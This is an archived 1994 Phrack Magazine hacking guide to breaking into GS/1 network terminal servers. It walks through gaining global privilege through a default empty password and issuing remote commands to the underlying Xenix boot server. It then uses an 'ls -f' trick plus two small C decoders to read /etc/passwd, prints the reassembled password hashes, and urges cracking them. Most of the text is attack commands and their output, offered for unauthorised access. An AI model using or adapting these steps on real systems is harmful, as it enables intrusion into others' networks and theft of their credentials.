The Hacker's Encyclopedia 1998

home *** CD-ROM | disk | FTP | other *** search

/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / phrack2 / phrack46.017 < prev next >

Wrap

Text File | 2003-06-11 | 24.7 KB | 604 lines

==Phrack Magazine== Volume Five, Issue Forty-Six, File 17 of 28 **************************************************************************** [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<] [<> <>] [<> ----+++===::: GETTiN' D0wN 'N D1RTy wiT Da GS/1 :::===+++---- <>] [<> <>] [<> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <>] [<> <>] [<> Brought to you by: <>] [<> [)elam0 Labz, Inc. and ChURcH oF ThE Non-CoNForMisT <>] [<> <>] [<> Story line: Maldoror -n- [)r. [)elam <>] [<> Main Characters: Menacing Maldoror & The Evil [)r. [)elam <>] [<> Unix Technical Expertise: Wunder-Boy [)elam <>] [<> Sysco Technishun: Marvelous Maldoror <>] [<> <>] [<> Look for other fine [)elamo Labz and ChURcH oF ThE <>] [<> Non-CoNForMisT products already on the market such as <>] [<> DEPL (Delam's Elite Password Leecher), NUIA (Maldoror's <>] [<> Tymnet NUI Attacker), TNET.SLT (Delam's cheap0 Telenet <>] [<> skanner for Telix), PREFIX (Maldoror's telephone prefix <>] [<> identification program), and various other programs and <>] [<> philez written by Dr. Delam, Maldoror, Green Paradox, <>] [<> El Penga, Hellpop, and other certified DLI and CNC members. <>] [<> <>] [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] Index ======================================== 1. Finding and identifying a GS/1 2. Getting help 3. Gaining top privilege access 4. Finding the boot server 5. Connecting to the boot server 6. Getting the boot server password file 7. Other avenues ---------------------------------------------------------------------------- Here's hacking a GS/1 made EZ (for the sophisticated hacker) It is advisable to fill your stein with Sysco and pay close attention... if Sysco is not available in your area, Hacker Pschorr beer will work almost as good... (especially Oktoberfest variety) What is a GS/1? --------------- A GS/1 allows a user to connect to various other computers... in other words, it's a server, like a DEC or Xyplex. So why hack it? --------------- Cuz itz there... and plus you kan access all sortz of net stuph fer phree. (QSD @ 208057040540 is lame and if you connect to it, you're wasting the GS/1.. the French fone police will fly over to your country and hunt you down like a wild pack of dogs, then hang you by your own twisted pair.) What to do: ----------- +--------------------------------------+ + #1. Finding and identifying a GS/1 + +--------------------------------------+ Find a GS/1 .. they're EZ to identify.. they usually have a prompt of GS/1, though the prompt can be set to whatever you want it to be. A few years ago there were quite a number of GS/1's laying around on Tymnet and Telenet... you can still find a few if you scan the right DNIC's. (If you don't know what the hell I'm talking about, look at some old Phracks and LOD tech. journals.) The prompt will look similar to this: (!2) GS/1> (The (!2) refers to the port you are on) +--------------------+ + #2. Getting help + +--------------------+ First try typing a '?' to display help items. A help listing looks like this: > (!2) GS/1>? > Connect <address>[,<address>] [ ECM ] [ Q ] > DO <macro-name> > Echo <string> > Listen > Pause [<seconds>] > PIng <address> [ timeout ] > SET <param-name> = <value> ... > SHow <argument> ... At higher privileges such as global (mentioned next) the help will look like this (note the difference in the GS/1 prompt with a # sign): > (!2) GS/1# ? > BRoadcast ( <address> ) <string> > Connect ( <address> ) <address>[,<address>] [ ECM ] [ Q ] > DEFine <macro-name> = ( <text> ) > DisConnect ( <address> ) [<session number>] > DO ( <address> ) <macro-name> > Echo <string> > Listen ( <address> ) > Pause [<seconds>] > PIng <address> [ timeout ] > ReaD ( <address> ) <option> <parameter> > REMOTE <address> > ROtary ( <address> ) !<rotary> [+|-]= !<portid>[-!<portid>] , ... > SAve ( <address> ) <option> <filename> > SET ( <address> ) <param-name> = <value> ... > SETDefault ( <address> ) [<param-name> = <value>] ... > SHow ( <address> ) <argument> ... > UNDefine ( <address> ) <macro-name> > UNSave ( <address> ) <filename> > ZeroMacros ( <address> ) > ZeroStats ( <address> ) Additional commands under global privilege are: BRoadcast, DEFine, DisConnect, ReaD, REMOTE, ROtary, UNDefine, UNSave, ZeroMacros, ZeroStats, and a few extra options under the normal user commands. If you need in-depth help for any of the commands, you can again use the '?' in the following fashion: > (!2) GS/1>sho ? > SHow ADDRess > SHow ClearingHouseNames [ <name> [ @ <domain> [@ <organ.> ] ] ] > SHow DefaultParameters [<param-name> ...] > SHow GLobalPARameters > SHow NetMAP [ Short | Long ] > SHow PARAmeterS [<param-name> ...] > SHow <param-name> ... > SHow SESsions [ P ] > SHow VERSion > (!2) GS/1>sh add? > SHow ADDRess > (!2) GS/1>sh add > ADDRess = &000023B5%07000201E1D7!2 "sh add" displays your own network, address and port number. The network is 000023B5 The address is 07000201E1D7 The port number is 2 +------------------------------------+ + #3. Gaining top privilege access + +------------------------------------+ Figure out the global password. Do a "set priv=global" command. Note: ---- There are 3 states to set priv to: user, local, and global. Global is the state with the most privilege. When you attain global privilege, your prompt will change to have a '#' sign at the end of it.. this means you have top priceless (similar to *nix's super user prompt). The GS/1 will prompt you for a password. The default password on GS/1's is to have no password at all... The GS/1 will still prompt you for a password, but you can enter anything at this point if the password was never set. +-------------------------------+ + #4. Finding the boot server + +-------------------------------+ Figure out the boot server address available from this GS/1 .. The boot server is what lies under the GS/1. We've found that GS/1's are actually run on a Xenix operating system.. (which is of course a nice phamiliar territory) It's debatable whether all GS/1's are run on Xenix or not as we have yet to contact the company. (We may put out a 2nd file going into more detail.) Do a "sh b" or "sh global" as shown in the following examples: > (!2) GS/1# sh b > BAud = 9600 BootServerAddress = &00000000%070002017781 > BReakAction = ( FlushVC, InBand ) BReakChar = Disabled > BSDelay = None BUffersize = 82 > (!2) GS/1# sh global > ...............................Global Parameters............................ > DATE = Wed Jun 22 21:16:45 1994 TimeZone = 480 minutes > DaylightSavingsTime = 0 minutes LogoffStr = "L8r laM3r" > WelcomeString = "Welcome to your haqued server (!2), Connected to " > DOmain = "thelabz" Organization = "delam0" > PROmpt = "GS/1>" NMPrompt = "GS/1# " > LocalPassWord = "" GlobalPassWord = "haque-me" > NetMapBroadcast = ON MacType = EtherNET > CONNectAudit = ON ERRorAudit = ON > AUditServerAddress = &000031A4%07000200A3D4 > AUditTrailType = Local > BootServerAddress = &00000000%070002017781 Side note: the GlobalPassWord is "haque-me" whereas the LocalPassWord is "" ... these are the actual passwords that need to be entered (or in the case of the LocalPassWord, "" matches any string). You'll only be able to "sh global" after a successful "set priv=global". Now that you have the boot server address, the next step is enabling communication to the boot server. +-------------------------------------+ + #5. Connecting to the boot server + +-------------------------------------+ Do a REMOTE <address> where address is the address of the machine you want to issue remote commands to. > (!2) GS/1# REMOTE %070002017781 > (!2) Remote: ? > BInd <address> [-f <bootfile>] [-l <loader>] [<nports>] > BRoadcast ( <address> ) "<string>" > CoPyfile [<address>:]<pathname> [<address>:][<pathname>] > LiSt [ -ls1CR ] [<pathname> ...] > MoVe <pathname> <pathname> > NAme <clearinghouse name> = <address>[,<address>]... > Ping <address> [timeout] > ReMove <pathname> ... > SET [( <address> )] <param-name> = <value> ... > SETDefault <param-name> = <value> ... > SHow <argument> > UNBind <address> > UNDefine <macro name> > UNName <name> > ZeroStats > <BREAK> (to leave remote mode) Your prompt changes from "(!2) GS/1# " to "(!2) Remote: "... this means you will be issuing commands to whatever remote machine you specified by the REMOTE <address> command. Notice for this case, the boot server's address was used. When you get the REMOTE: prompt, you can issue commands that will be executed on the remote machine. Try doing a '?' to see if it's another GS/1.. if not, try doing 'ls' to see if you have a *nix type machine. Also notice that the help commands on the remote are not the same as those for the GS/1 (though, if you establish a remote link with another GS/1 they will be the same). > (!2) Remote: ls -l > total 1174 > drwxrwxrwx 2 ncs ncs 160 Aug 17 1989 AC > drwxrwxrwx 2 ncs ncs 5920 Jun 5 00:00 AUDIT_TRAIL > drwxrwxrwx 2 ncs ncs 96 Jun 5 01:00 BACKUP > drwxrwxrwx 2 ncs ncs 240 Jun 4 04:42 BIN > drwxrwxrwx 2 ncs ncs 192 Jun 4 04:13 CONFIGS > drwxrwxrwx 2 ncs ncs 64 Aug 17 1989 DUMP > drwxrwxrwx 2 ncs ncs 80 Aug 17 1989 ETC > drwxrwxrwx 2 ncs ncs 160 Jun 4 04:13 GLOBALS > -rw-r--r-- 1 ncs ncs 228 Jun 5 00:59 btdata > -rw-r--r-- 1 ncs ncs 8192 Jun 8 1993 chnames.dir > -rw-r--r-- 1 ncs ncs 11264 Jun 1 13:41 chnames.pag > drwxrwxrwx 2 ncs ncs 48 Jun 5 00:00 dev > drwx------ 2 bin bin 1024 Aug 17 1989 lost+found > -rw-rw-rw- 1 ncs ncs 557056 Mar 23 1992 macros > -rw-r--r-- 1 ncs ncs 512 Oct 22 1993 passwd Look familiar?? If not, go to the nearest convenient store and buy the a 12 pack of the cheapest beer you can find.. leave your computer connected so you hurry back, and slam eight or nine cold onez... then look at the screen again. You're basically doing a Remote Procedure Call for ls to your Xenix boot server. Notice at this point that the "passwd" is not owned by root. This is because this is not the system password file, and you are not in the "/etc" directory... (yet) There are a couple of problems: > (!2) Remote: cat > Invalid REMOTE command > > (!2) Remote: cd /etc > Invalid REMOTE command You cannot view files and you cannot change directories. To solve the "cd" problem do the following: > (!2) Remote: ls -l .. > total 26 > drwxrwxrwx 12 root root 352 Jun 5 00:59 NCS > drwxr-xr-x 2 bin bin 112 Aug 17 1989 adm > drwxrwx--- 2 sysinfo sysinfo 48 Aug 17 1989 backup > drwxr-xr-x 2 bin bin 1552 Aug 17 1989 bin > drwxr-xr-x 20 bin bin 720 Aug 17 1989 lib > drwxrwxrwx 6 ncs ncs 224 Aug 17 1989 ncs > drwxr-xr-x 2 bin bin 32 Aug 17 1989 preserve > drwxr-xr-x 2 bin bin 64 Aug 17 1989 pub > drwxr-xr-x 7 bin bin 144 Aug 17 1989 spool > drwxr-xr-x 9 bin bin 144 Aug 17 1989 sys > drwxr-x--- 2 root root 48 Aug 17 1989 sysadm > drwxrwxrwx 2 bin bin 48 Jun 5 01:00 tmp > > (!2) Remote: ls -l ../.. > total 1402 > -rw-r--r-- 1 root root 1605 Aug 17 1989 .login > -r--r--r-- 1 ncs ncs 1605 Aug 28 1990 .login.ncs > -rw-r--r-- 1 root root 653 Aug 17 1989 .logout > -r--r--r-- 1 ncs ncs 653 Aug 28 1990 .logout.ncs > -rw------- 1 root root 427 Aug 17 1989 .profile > drwxr-xr-x 2 bin bin 2048 Aug 17 1989 bin > -r-------- 1 bin bin 25526 May 4 1989 boot > drwxr-xr-x 6 bin bin 3776 Aug 17 1989 dev > -r-------- 1 bin bin 577 Nov 3 1987 dos > drwxr-xr-x 5 bin bin 1904 Jun 2 12:40 etc > drwxr-xr-x 2 bin bin 64 Aug 17 1989 lib > drwx------ 2 bin bin 1024 Aug 17 1989 lost+found > drwxr-xr-x 2 bin bin 32 Aug 17 1989 mnt > drwxrwxrwx 2 bin bin 512 Jun 5 01:20 tmp > drwxr-xr-x 14 bin bin 224 Aug 17 1989 usr > -rw-r--r-- 1 bin bin 373107 Aug 17 1989 xenix > -rw-r--r-- 1 root root 287702 Aug 17 1989 xenix.old Your brain should now experience deja vous.. you just found the root directory. (for the non-*nix, lam0-hacker, the root directory has key *nix directories such as /etc, /bin, /dev, /lib, etc. in it.) Now you can get to /etc/passwd as follows: > (!2) Remote: ls -l ../../etc > total 1954 > -rwx--x--x 1 bin bin 7110 May 8 1989 accton > -rwx------ 1 bin bin 1943 May 8 1989 asktime > -rwx------ 1 bin bin 31756 May 8 1989 badtrk > -rw-rw-rw- 1 root root 1200 Apr 24 12:40 bootlog > -rwx--x--x 1 bin bin 24726 May 8 1989 brand > -rw-r--r-- 1 bin bin 17 Aug 17 1989 checklist > -rw-r--r-- 2 bin bin 17 Aug 17 1989 checklist.last > -rw-r--r-- 1 ncs ncs 17 Aug 28 1990 checklist.ncs > -rw-r--r-- 2 bin bin 17 Aug 17 1989 checklist.orig > -rwx------ 1 bin bin 2857 May 8 1989 chsh > -rwx------ 1 bin bin 7550 May 8 1989 clri > -rwx------ 1 bin bin 8034 May 8 1989 cmos > -rwxr-xr-x 1 root bin 31090 Aug 28 1990 cron > -rw-r--r-- 1 bin bin 369 May 8 1989 cshrc > ...... etc. > -rw-r--r-- 1 root root 465 Mar 5 1991 passwd Yeah, now what?! You've found the /etc/passwd file, but you don't have "cat" to type the file out. Now you're stuck... so drink a half a bottle of Sysco per person. (We did... and as you'll see, Sysco is the drink of a manly hackers like us... make sure it's the big bottle kind not those girly small onez.) +---------------------------------------------+ + #6. Getting the boot server password file + +---------------------------------------------+ There is one way to get around the cat problem (no itz n0t puttin catnip laced with somethin U made frum a phile on yer doorstep) It's done using ls. On this Xenix system, the directory structure is the old Unix format: A 16 byte record comprised of a 2 byte I-number and a 14 byte character field. Note about directory structure for the inquisitive hacker: In a directory record there is a 14 byte string containing the file name, and the 2 byte I-number (2 bytes = an integer in this case) which is a number that is an (I)ndex pointer to the I-node. The I-node then contains the information about where the file's data is actually kept (similar to how a FAT table works on an IBM PC yet a different concept as it has indirect index blocks etc. I won't get into) and what permissions are set for the file. Be warned that in newer *nix implementations, file names can be more than 14 characters and the directory structure will be a bit different than discussed. The "ls" command has an option that allows you to tell it "this *file* is a *directory*.. so show me what's in the directory"... newer *nix systems won't like this (the -f option) because of the new directory structure. > (!2) Remote: ls -? > ls: illegal option --? > usage: -1ACFRabcdfgilmnopqrstux [files] > > (!2) Remote: ls -1ACFRabcdfgilmnopqrstux ../../etc/passwd > 28530 ot:BJlx/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys > 25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr > 29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for > 28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a > 28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/ > 29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO > 20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy > 26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information > 12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin > 29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri > 29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL > 18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFnHnL > 22327 xcU:100:100:NC 8275 operator:/usr/ > > (!2) Remote: <BRK> > (!2) GS/1# Wow, kewl. Now that you have a bunch-o-shit on your screen, you have to make some sense out of it. The password file is almost legible, but the I-numbers still need to be converted to ASCII characters. This can be accomplished in a variety of ways... the easiest is to write a program like the following in C: On a PC the following code should work: #include <stdio.h> main() { union { int i; char c[2]; } x; while (1) { printf("Enter I-Number: "); scanf("%d", &x.i); printf("%d = [%c][%c]\n\n", x.i, x.c[0], x.c[1]); } } On a *nix based system the following code will work (depending on word size and byte arrangement): #include <stdio.h> main() { union { short int i; char c[2]; } x; while (1) { printf("Enter I-Number: "); scanf("%hd", &x.i); printf("%d = [%c][%c]\n\n", x.i, x.c[1], x.c[0]); } } When you have translated the I-numbers you can substitute the ASCII values by hand (or write a d0p3 program to do it for you): 28530 ot:BJlx/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys 28530 = [r][o] 30580 = [t][w] 14962 = [r][:] root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys 25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr 25697 = [a][d] 14929 = [Q][:] 28265 = [i][n] adm:X/haSqFDwHz1Q:0:0:System Administration:/usr 29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for 29487 = [/][s] 29283 = [c][r] 17210 = [:][C] /sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for 28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a 28704 = [ ][p] 14895 = [/][:] 13114 = [:][3] periodic tasks:/:?bin:NOLOGIN:3:3:System file a 28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/ 28004 = [d][m] 29962 = [^M][u] 25697 = [a][d] dministration:/: uucp::4:4:Uucp administration:/ 29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO 29557 = [u][s] 27746 = [b][l] 28771 = [c][p] usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO 20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy 20300 = [L][O] 25185 = [a][b] 26990 = [n][i] LOGIN:6:6:Assignable device administration:/:?sy 26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information 26995 = [s][i] 12602 = [:][1] 29811 = [s][t] sinfo:NOLOGIN:10:10:Access to system information 12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin 12090 = [:][/] 18759 = [G][I] 25710 = [n][d] :/:?network:NOLOGIN:12:12:Mail and Network admin 29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri 29545 = [i][s] 28528 = [p][o] 20302 = [N][O] istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri 29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL 29806 = [n][t] 29545 = [i][s] 28528 = [p][o] nt spooler administration:/usr/spool/lp:?dos:NOL 18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFmHnL 18255 = [O][G] 8307 = [s][ ] 12090 = [:][/] OGIN:16:10:Access to Dos devices:/:?ncs:yYNFnHnL 22327 xcU:100:100:NC 8275 operator:/usr/ 22327 = [7][W] 8275 = [S][ ] 7WxcU:100:100:NCS operator:/usr The resulting file will look like the following: root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys adm:X/haSqFDwHz1Q:0:0:System Administration:/usr /sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for periodic tasks:/:?bin:NOLOGIN:3:3:System file a dministration:/: uucp::4:4:Uucp administration:/ usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO LOGIN:6:6:Assignable device administration:/:?sy sinfo:NOLOGIN:10:10:Access to system information :/:?network:NOLOGIN:12:12:Mail and Network admin istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri nt spooler administration:/usr/spool/lp:?dos:NOL OGIN:16:10:Access to Dos devices:/:?ncs:yYNFmHnL 7WxcU:100:100:NCS operator:/usr Because the ls command cannot display "non-printable" characters such as the carriage return, it will replace them with a '?' character... delete the '?' characters and divide by line at these locations. When you finish doing that, you'll have a standard /etc/passwd file: root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh sysadm:X/haSqFDwHz1Q:0:0:System Administration:/usr/sysadm:/bin/sh cron:NOLOGIN:1:1:Cron daemon for periodic tasks:/: bin:NOLOGIN:3:3:System file administration:/: uucp::4:4:Uucp administration:/usr/spool/uucppublic:/usr/lib/uucp/uucico asg:NOLOGIN:6:6:Assignable device administration:/: sysinfo:NOLOGIN:10:10:Access to system information:/: network:NOLOGIN:12:12:Mail and Network administration:/usr/spool/micnet: lp:NOLOGIN:14:3:Print spooler administration:/usr/spool/lp: dos:NOLOGIN:16:10:Access to Dos devices:/: ncs:yYNFmHnL7WxcU:100:100:NCS operator:/usr Once you've assembled your password file in a standard ASCII form, you'll of course want to crack it with one of the many available DES cracking programs. +---------------------+ + #7: Other Avenues + +---------------------+ Find out what else you can play with by first finding what networks are available other than your own, and second, find out what machines are on your network: >(!2) GS/1# sh att > Attached Networks >&000023B5 >(!2) GS/1# sh nmap l > NETWORK &000023B5 MAP > > 1-%070002017781 SW/AT-NCS 3.0.2 2-%070002A049C5 SW/NB-BR-3.1.1.1 > 3-%0700020269A7 SW/200-A/BSC/SDL22000 4-%07000201C089 SW/200-A/BSC/SDL22020 > 5-%070002023644 SW/200-A/BSC/SDL22020 6-%0700020138B2 SW/AT-NCS 2.1.1 > 7-%070002010855 SW/100-A/BSC 20060 8-%070002018BA2 SW/20-XNS-X.25 .0.2 > .... etc. The boot server address, from previous examples, is number 1 which contains a description "SW/AT-NCS". Examining the rest of the list, number 6 has the same description. System 12 may be just another address for the boot server or it may be a different Xenix... but it should be Xenix whatever it is. We have refrained from covering the typical GS/1 information that has been published by others; and instead, covered newer concepts in GS/1 hacking. This phile is not a complete guide to GS/1 hacking; but expect successive publications on the topic.